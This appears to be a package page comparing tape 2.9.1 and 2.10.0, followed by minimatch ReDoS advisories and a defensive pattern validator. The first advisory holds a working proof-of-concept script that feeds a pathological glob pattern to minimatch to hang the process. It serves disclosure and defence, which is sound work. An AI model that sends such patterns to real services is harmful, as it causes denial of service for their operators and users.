Tape version 2.10.0 is a refinement of the TAP-producing test harness, building on version 2.9.1. The key difference is that version 2.10.0 adds glob as a dependency. Projects on the newer version gain file matching in their tests, which simplifies including multiple test files or filtering them by pattern; this is most useful in larger projects where organization and selective test execution matter.
The core functionality and developer experience are largely unchanged, so version 2.10.0 mainly benefits projects whose tests select files by pattern. The other dependencies and devDependencies are the same across both versions, which suggests a stable underlying test infrastructure and an upgrade that should integrate with existing workflows as before. The development dependencies tap, falafel, and concat-stream continue to support the harness's own testing and code analysis.
Ultimately, the choice between versions depends on the project's testing needs. If file globbing is a recurring requirement, version 2.10.0 is the more productive choice; otherwise, version 2.9.1 remains a reliable, well-established option. Both versions are MIT licensed, permitting open-source use and modification. James Halliday (substack) remains the author, continuing the library's established history under a well-known maintainer.
Known vulnerabilities affecting version 2.10.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require("minimatch");
// utility function for generating long strings of a single character
var genstr = function (len, chr) {
var result = "";
for (var i = 0; i < len; i++) {
result = result + chr;
}
return result;
};
// pattern that triggers the pathological regular expression: a negated
// character class that is never closed, followed by a very long run of escapes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when the braceExpand function is called with specific arguments, resulting in a Denial of Service.
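Both advisories above concern untrusted strings reaching minimatch's pattern argument. The guard below is an added example, not code from tape, minimatch, or either advisory: it rejects a pattern before it is handed to minimatch when the pattern is over-long, carries an excessive number of escape characters (the shape of the PoC above), or leaves a character class unclosed. The length and escape limits are assumptions chosen for this example, and the guard complements, rather than replaces, upgrading to a fixed minimatch release.

```javascript
// Added example: validate an untrusted glob pattern before calling
// minimatch(path, pattern). Limits below are assumptions for illustration.
const MAX_PATTERN_LENGTH = 256;
const MAX_ESCAPES = 16;

// Returns true when a '[' is never closed by a matching ']',
// treating backslash-escaped characters as literals.
function hasUnclosedClass(pattern) {
  let inClass = false;
  for (let i = 0; i < pattern.length; i++) {
    const c = pattern[i];
    if (c === '\\') { i++; continue; } // skip the escaped character
    if (!inClass && c === '[') inClass = true;
    else if (inClass && c === ']') inClass = false;
  }
  return inClass;
}

// Returns { ok: true } or { ok: false, reason } without evaluating the
// pattern, so a pathological input never reaches the regex engine.
function checkUntrustedPattern(pattern, opts = {}) {
  const maxLength = opts.maxLength ?? MAX_PATTERN_LENGTH;
  const maxEscapes = opts.maxEscapes ?? MAX_ESCAPES;
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern is not a string' };
  }
  if (pattern.length > maxLength) {
    return { ok: false, reason: 'pattern too long' };
  }
  const escapes = (pattern.match(/\\/g) || []).length;
  if (escapes > maxEscapes) {
    return { ok: false, reason: 'too many escape characters' };
  }
  if (hasUnclosedClass(pattern)) {
    return { ok: false, reason: 'unclosed character class' };
  }
  return { ok: true };
}

// Constructed inputs: an ordinary glob and the shape of the PoC pattern.
const benign = 'test/**/*.js';
const pocShaped = '[!' + '\\'.repeat(1000000) + 'A';
console.log(benign, checkUntrustedPattern(benign));
console.log('poc-shaped pattern', checkUntrustedPattern(pocShaped));
```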